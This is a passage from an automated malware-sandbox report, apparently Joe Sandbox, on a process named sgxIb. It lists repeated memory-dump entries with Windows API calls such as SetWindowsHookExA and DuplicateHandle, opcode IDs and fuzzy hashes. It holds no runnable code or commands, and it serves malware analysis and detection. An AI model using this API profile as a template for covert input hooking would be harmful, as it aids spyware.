                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: d807bd6f306615b49483584d336009b51e843d4672f8c70c1b670a1e43e24675
                                                                                                                    • Instruction ID: abaef4adda1db64913e78aa9b1d0be4a386ec58a2f6dab179aac585db676adcd
                                                                                                                    • Opcode Fuzzy Hash: d807bd6f306615b49483584d336009b51e843d4672f8c70c1b670a1e43e24675
                                                                                                                    • Instruction Fuzzy Hash: 5E21E6B59003499FDB10CFA9D984ADEBFF9FB48320F14841AE918A7351D374A954CF61
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06EC9C1F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: a340fb1cb26e054a69b59c774f746e6629d7ca738600143ea3d0ec49cf5355f2
                                                                                                                    • Instruction ID: e91fd6c61f6d5e1dbd55f802c20ba6747298bea658eea33262495405a12bdbff
                                                                                                                    • Opcode Fuzzy Hash: a340fb1cb26e054a69b59c774f746e6629d7ca738600143ea3d0ec49cf5355f2
                                                                                                                    • Instruction Fuzzy Hash: 5521E4B59003499FDB10CFAAD984ADEBFF8FB48320F14841AE918A7351D374A954CF60
                                                                                                                    APIs
                                                                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06ECD32B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HookWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2559412058-0
                                                                                                                    • Opcode ID: b1394c144c693b91d7aba6ea8a6701786e4357355f423c56785a0a1c4165fd24
                                                                                                                    • Instruction ID: ad4f145b80a9688e3a86b60ce5866319dc7659bb72853d4881ed2f511cd81ba1
                                                                                                                    • Opcode Fuzzy Hash: b1394c144c693b91d7aba6ea8a6701786e4357355f423c56785a0a1c4165fd24
                                                                                                                    • Instruction Fuzzy Hash: B92137B1D002099FCB14CF9AD944BEEFBF5AF88320F10842AD419A7250C7756944CFA1
                                                                                                                    APIs
                                                                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06ECD32B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HookWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2559412058-0
                                                                                                                    • Opcode ID: f7abce647ce5bbdefbcc479cc284c50d22951800411c024f28b05a793fb44a76
                                                                                                                    • Instruction ID: c77a05c39e96a0841116d3f4e826eee1a776d46844fab0675ce55ea002fa9181
                                                                                                                    • Opcode Fuzzy Hash: f7abce647ce5bbdefbcc479cc284c50d22951800411c024f28b05a793fb44a76
                                                                                                                    • Instruction Fuzzy Hash: 7E21F4B1D002099FCB54DF9AD948BEEFBF5EF88324F10842AD419A7290C775A945CFA1
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 06EC4C56
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: 8a0b66847c63839ac90267b37b107c0fef766fac4277404eb952e9a0017965d6
                                                                                                                    • Instruction ID: fd0e02f268fe692cefd7ccf80e6de3106f7f3f3fd16fc046a69961391bdc17eb
                                                                                                                    • Opcode Fuzzy Hash: 8a0b66847c63839ac90267b37b107c0fef766fac4277404eb952e9a0017965d6
                                                                                                                    • Instruction Fuzzy Hash: 8A11EFB5C003498EDB20DF9AC944ADEFBF9AB88324F10841AD469A7250C375A545CFA1
                                                                                                                    APIs
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0187EEBF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.2975467867.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_1870000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1890195054-0
                                                                                                                    • Opcode ID: 386d287769aa437deccf1433ca2d5c4cf1eea0ea5b4bb3b7f2fa78be7243c9f4
                                                                                                                    • Instruction ID: 84ee52f209e562deecaf35bddc8c586883e326afd0cda365e53751e0cf2de139
                                                                                                                    • Opcode Fuzzy Hash: 386d287769aa437deccf1433ca2d5c4cf1eea0ea5b4bb3b7f2fa78be7243c9f4
                                                                                                                    • Instruction Fuzzy Hash: 541123B1C002599BCB10DF9AC444BDEFBF4EF48320F11856AD918B7241D378AA44CFA1
                                                                                                                    APIs
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 06ECB67D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2538663250-0
                                                                                                                    • Opcode ID: d99d6f5beba9e46f90d3f20649dce3dfb754d91ef91cb36fcedfca9a34cf8573
                                                                                                                    • Instruction ID: c919e6897a8d69b1dafb2bdb5f4c1e65812ed67285ed2c310593e787fdccc971
                                                                                                                    • Opcode Fuzzy Hash: d99d6f5beba9e46f90d3f20649dce3dfb754d91ef91cb36fcedfca9a34cf8573
                                                                                                                    • Instruction Fuzzy Hash: 741166B19003488FCB20DFAAD449BDEFFF8EB48320F14845AD518A7201C375A584CFA5
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 06EC4C56
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: 315185b8cb9ba691508a8833510ec0aed6de366d193a1211b6747b6913717de2
                                                                                                                    • Instruction ID: 2bded12250c1dabd0c4c88a76ce5834496c8c47ca1b73c6c9447eda12e940b6e
                                                                                                                    • Opcode Fuzzy Hash: 315185b8cb9ba691508a8833510ec0aed6de366d193a1211b6747b6913717de2
                                                                                                                    • Instruction Fuzzy Hash: 4811F0B5C00349CFDB10DF9AD544ADEFBF4EB88224F11841AD429B7250D375A546CFA5
                                                                                                                    APIs
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 06ECB67D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2538663250-0
                                                                                                                    • Opcode ID: e09c95f07f73fd0cd5eb61e8368030d1ca3339e5c3bc4a961956d9e20fc267c1
                                                                                                                    • Instruction ID: ef75368af54cf07d52ddd40fbb6c9ca8314e177569d4b50d55b93c47c5b7d7c6
                                                                                                                    • Opcode Fuzzy Hash: e09c95f07f73fd0cd5eb61e8368030d1ca3339e5c3bc4a961956d9e20fc267c1
                                                                                                                    • Instruction Fuzzy Hash: 721148B1C107498FCB20DF99C945BDEBBF4EB48320F20845AD519A7310D375A944CFA5
                                                                                                                    APIs
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06ECAD35), ref: 06ECADBF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2492992576-0
                                                                                                                    • Opcode ID: c73a0bf280ee4fe874a62c909ab155aee275a7a725fd3c3233bed1cf2fa63252
                                                                                                                    • Instruction ID: b86718fb71cfb09341a6bccd21c81943e279dab87f4106aab17e9cea1d8ec6c5
                                                                                                                    • Opcode Fuzzy Hash: c73a0bf280ee4fe874a62c909ab155aee275a7a725fd3c3233bed1cf2fa63252
                                                                                                                    • Instruction Fuzzy Hash: 261103B58003498FCB20DF9AD945BDEBFF8EB48324F20841AE519A7250D775A544CFA5
                                                                                                                    APIs
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06ECAD35), ref: 06ECADBF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2492992576-0
                                                                                                                    • Opcode ID: 80a41a2d32826d729b7e10c6617bfd61b3cfa2c6b2fd801090891ed6354087f9
                                                                                                                    • Instruction ID: da550a73ab56dc456fe6f6f7b75bdea29c800e681697ec30d3dc40a3042431a8
                                                                                                                    • Opcode Fuzzy Hash: 80a41a2d32826d729b7e10c6617bfd61b3cfa2c6b2fd801090891ed6354087f9
                                                                                                                    • Instruction Fuzzy Hash: 6B1133B08003498FCB20DF9EC549BDEBFF4EB48324F20842AD919A7240D774A944CFA4
                                                                                                                    APIs
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 06ECB67D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2538663250-0
                                                                                                                    • Opcode ID: 29c4b425a2f038b35f5a1eea9c40be12d944d01cfba3e741d3a1d371c614ca3c
                                                                                                                    • Instruction ID: 5ffdfb29b6df7371cbace0f400bb94b8ee8d985982c1887cf3a0d18783d4a994
                                                                                                                    • Opcode Fuzzy Hash: 29c4b425a2f038b35f5a1eea9c40be12d944d01cfba3e741d3a1d371c614ca3c
                                                                                                                    • Instruction Fuzzy Hash: 7B1142B08007488FCB20DF9AC949BDEBBF8EB48320F20845AD519B7300C378A944CFA5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 0-3993045852
                                                                                                                    • Opcode ID: b33b6d5c32bb2c919b94c58854b2b675d4e4742d502df5c290d4dbceb2f4ea90
                                                                                                                    • Instruction ID: 5dc11c33087c1e42e00af539bf67a033ffd188b90085e87ac3053402cd0a14a4
                                                                                                                    • Opcode Fuzzy Hash: b33b6d5c32bb2c919b94c58854b2b675d4e4742d502df5c290d4dbceb2f4ea90
                                                                                                                    • Instruction Fuzzy Hash: 63B1AD75E002198FDB54DFA4C4846EEBBF2BF88324F248569D499BB344DB31AD42CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PH^q
                                                                                                                    • API String ID: 0-2549759414
                                                                                                                    • Opcode ID: a0f57d569d9f8b44ad718eba25049f10ed4eb70d64df66c1f53b28c00430e859
                                                                                                                    • Instruction ID: c70fa92cd4084f82a5657ffe39ea174106ba3c9b83b9315d66ed3697a52193cf
                                                                                                                    • Opcode Fuzzy Hash: a0f57d569d9f8b44ad718eba25049f10ed4eb70d64df66c1f53b28c00430e859
                                                                                                                    • Instruction Fuzzy Hash: 21418E70E0030A9FDF61DFA5C85479EBBB2FF85304F208929E805EB240DB70A946CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PH^q
                                                                                                                    • API String ID: 0-2549759414
                                                                                                                    • Opcode ID: dbd2887ea3f282bea7c337ae35da373f24bc83e8697b997ff2bba2bc9a763630
                                                                                                                    • Instruction ID: e8e4925f178278bf5332472028cb0089d03a7d67135baba8ecc03f4af9723c85
                                                                                                                    • Opcode Fuzzy Hash: dbd2887ea3f282bea7c337ae35da373f24bc83e8697b997ff2bba2bc9a763630
                                                                                                                    • Instruction Fuzzy Hash: 58419D70E007099FDF61DFB5C88469EBBB2FF85204F14992AE805EB240DB71A847CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: PH^q
                                                                                                                    • API String ID: 0-2549759414
                                                                                                                    • Opcode ID: d99e9dbb95b7d3c337e2e1bcf9448f9515103974d1486dd5b43eee146731a3c4
                                                                                                                    • Instruction ID: 605afb3309a86aba9f04c017e2e475246e86455f027eab9b3c29db49ba71f420
                                                                                                                    • Opcode Fuzzy Hash: d99e9dbb95b7d3c337e2e1bcf9448f9515103974d1486dd5b43eee146731a3c4
                                                                                                                    • Instruction Fuzzy Hash: 0A31CF30B103058FDB599B74C51866F7BE3AF89218F209429E60ADB385DE35DE46C7A1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q
                                                                                                                    • API String ID: 0-388095546
                                                                                                                    • Opcode ID: b02a9937d2f76327e9ecfc22649168c07a49ed58034a71959fd2dc89d0115000
                                                                                                                    • Instruction ID: 9e9220752c735c02e58131d983cd7a5285f7370fb0fc0d15a82704d69c63e14d
                                                                                                                    • Opcode Fuzzy Hash: b02a9937d2f76327e9ecfc22649168c07a49ed58034a71959fd2dc89d0115000
                                                                                                                    • Instruction Fuzzy Hash: EAF02231B00315CFDF649A88F9412BA73AEFB84308F1064A6D908CB250CB75ED03CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: \Ocq
                                                                                                                    • API String ID: 0-2995510325
                                                                                                                    • Opcode ID: 5538548f766fd0bbc57837dbe7b13b24b2d59119853d41b77bf5801aa93f3942
                                                                                                                    • Instruction ID: 6074d2079025097aa8acb40cc067d0b846e54ecfa3372e8473557ed738c861b1
                                                                                                                    • Opcode Fuzzy Hash: 5538548f766fd0bbc57837dbe7b13b24b2d59119853d41b77bf5801aa93f3942
                                                                                                                    • Instruction Fuzzy Hash: 36F0DA30A10219DBDB14DF94E959BAEBBB2FF98704F204519E002A72D8CB701C02CB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 75630f0381da80ff406aef3cc06fc4bdc778b53f708a34d0a16729d1eddc8357
                                                                                                                    • Instruction ID: b638d878f93ef6877f455b5edea5bc30af809fc1c08b0edcae28bb63a5895a3f
                                                                                                                    • Opcode Fuzzy Hash: 75630f0381da80ff406aef3cc06fc4bdc778b53f708a34d0a16729d1eddc8357
                                                                                                                    • Instruction Fuzzy Hash: 97B1A7B4F103099BEF64CB68C4947AEB7B6FB89314F215425E409DB381EB38DC829752
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c31a41b4c93281b9744304c025625582202d86c2fbdab0be98013c3e86d9a0ed
                                                                                                                    • Instruction ID: 4f03a8d11dd12ee31846f94b124da9cacd8b120e3243b45df3d1b051f030b4e7
                                                                                                                    • Opcode Fuzzy Hash: c31a41b4c93281b9744304c025625582202d86c2fbdab0be98013c3e86d9a0ed
                                                                                                                    • Instruction Fuzzy Hash: CBB195B4F103099BDF64CB68C4947AEB7B6FB89314F215425E409DB391EB38DC829752
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2a2d33e11cea15b1c0e3ee8aecc20df34daa342cdec0dfc468317442972dab31
                                                                                                                    • Instruction ID: 6a5190838fd7e78047bfdfca4710fb1680296def1dd6d3179d68aca73b7235b7
                                                                                                                    • Opcode Fuzzy Hash: 2a2d33e11cea15b1c0e3ee8aecc20df34daa342cdec0dfc468317442972dab31
                                                                                                                    • Instruction Fuzzy Hash: 66A14AB4E102098FDFA0CF58D484BADB7B1EB45318F25A926E419DB295EB34DC82CB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f6498b6db0dad497ebe66221adcf3f4c6e947548e8c1857739895e56f5dfb315
                                                                                                                    • Instruction ID: fc0a0cc50ec8d8d37d9d0643572ad496f68c318950d78a7d919d0c11c76d2352
                                                                                                                    • Opcode Fuzzy Hash: f6498b6db0dad497ebe66221adcf3f4c6e947548e8c1857739895e56f5dfb315
                                                                                                                    • Instruction Fuzzy Hash: E261B271F001214FCB549A7EC84866FAAD7AFC5614F15443AE80EDB364DE65ED0387D2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c04bc88688b77a0761d54401551924bb0d57b2b508ddd9357d430b24564a03e7
                                                                                                                    • Instruction ID: c80fc9561a2e45cadc929738611c0770caacff955994aa0a9107d42808264656
                                                                                                                    • Opcode Fuzzy Hash: c04bc88688b77a0761d54401551924bb0d57b2b508ddd9357d430b24564a03e7
                                                                                                                    • Instruction Fuzzy Hash: B7815C74B102099FDF44DFA8D4546AEB7F6AB89308F209525D41AEB394EF34EC438B91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 209d5ee78af6129d192afe48b3a4b2a2a45648b7b561d3f03631359e4bd40a66
                                                                                                                    • Instruction ID: 5874c155999d0bac0ac682144b292ed232882f4553c45285078f15f302d59296
                                                                                                                    • Opcode Fuzzy Hash: 209d5ee78af6129d192afe48b3a4b2a2a45648b7b561d3f03631359e4bd40a66
                                                                                                                    • Instruction Fuzzy Hash: FE814D34B102099FDF44DFA9D4546AEB7F6AB89304F109525D41AEB394EF34EC438B91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bb4268186cafd52c5ba574d1abd5ed10c6d43d7ea4f1b6e87bf921a99bad31f0
                                                                                                                    • Instruction ID: a964765003fc151318e2463294133ca29dcbb91b43ebbf0fc2d8ec15f25f2930
                                                                                                                    • Opcode Fuzzy Hash: bb4268186cafd52c5ba574d1abd5ed10c6d43d7ea4f1b6e87bf921a99bad31f0
                                                                                                                    • Instruction Fuzzy Hash: 06915E74E0031A8BDF60DF68C88079DB7B1FF99304F208595D54DBB285EB70AA86CB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 151385d057d2d0098e9dc2a31664573b2a10fde04ab4be520bf314e74063d73b
                                                                                                                    • Instruction ID: ab9a3d229dee2da0ea7891a9c8894928eddeea182c669399cc865c5e8924e34d
                                                                                                                    • Opcode Fuzzy Hash: 151385d057d2d0098e9dc2a31664573b2a10fde04ab4be520bf314e74063d73b
                                                                                                                    • Instruction Fuzzy Hash: 5E913D74E1021A8BDF60DF68C880B9DB7B1FF99304F208595D54DBB285DB70AA86CF91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dd2a02639c9ec55cfd5e258e181b88d25573ac0ec178aa115923a15e7c44d304
                                                                                                                    • Instruction ID: 5db088e61733b98c433dfbf7eed88ab3965ef9b52f601be0cc8dabea5435003f
                                                                                                                    • Opcode Fuzzy Hash: dd2a02639c9ec55cfd5e258e181b88d25573ac0ec178aa115923a15e7c44d304
                                                                                                                    • Instruction Fuzzy Hash: 7A714970A002099FDB44DFA9D984AADBBF6FF88304F249429D40AEB355DB30ED46CB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9af4f61dfe1aa55ac221d67fe86dfc9e0f2e4f5fed795d4c5afef7612cddc701
                                                                                                                    • Instruction ID: 2e91a0a35293ae59e89aed9d61ba5f351a85914b568c9edc5d5e63b05535e5cf
                                                                                                                    • Opcode Fuzzy Hash: 9af4f61dfe1aa55ac221d67fe86dfc9e0f2e4f5fed795d4c5afef7612cddc701
                                                                                                                    • Instruction Fuzzy Hash: 4151C670B203159BEF64967CD85476F2A9AD789315F20442BE50FCB3D5CE6DCC829392
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fd773aabdb58867bb99b71102136dafc924d453bf92580df9b0816d2cc2a6e19
                                                                                                                    • Instruction ID: 9637558da2557c0beac370f31d4f781e39ba0b5e0e76a0b26d2f80363fd8c399
                                                                                                                    • Opcode Fuzzy Hash: fd773aabdb58867bb99b71102136dafc924d453bf92580df9b0816d2cc2a6e19
                                                                                                                    • Instruction Fuzzy Hash: 0151D331E00205DFCF14EB79E4486ADB7B2FF84329F20886AE40ADB251DB318C46CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aa4b270d32861957c8e7c47399cdd8b787360a6ec6800a1695f83ae3842e3f8e
                                                                                                                    • Instruction ID: 4ff23c9d3f2c0069ab98b0f75a4d020535b53b8b71d794996b62d5421216903d
                                                                                                                    • Opcode Fuzzy Hash: aa4b270d32861957c8e7c47399cdd8b787360a6ec6800a1695f83ae3842e3f8e
                                                                                                                    • Instruction Fuzzy Hash: 07519035E14305DFDF608F69C48077EBBB2EB45318F20997AE56ADB281C635E842CB91
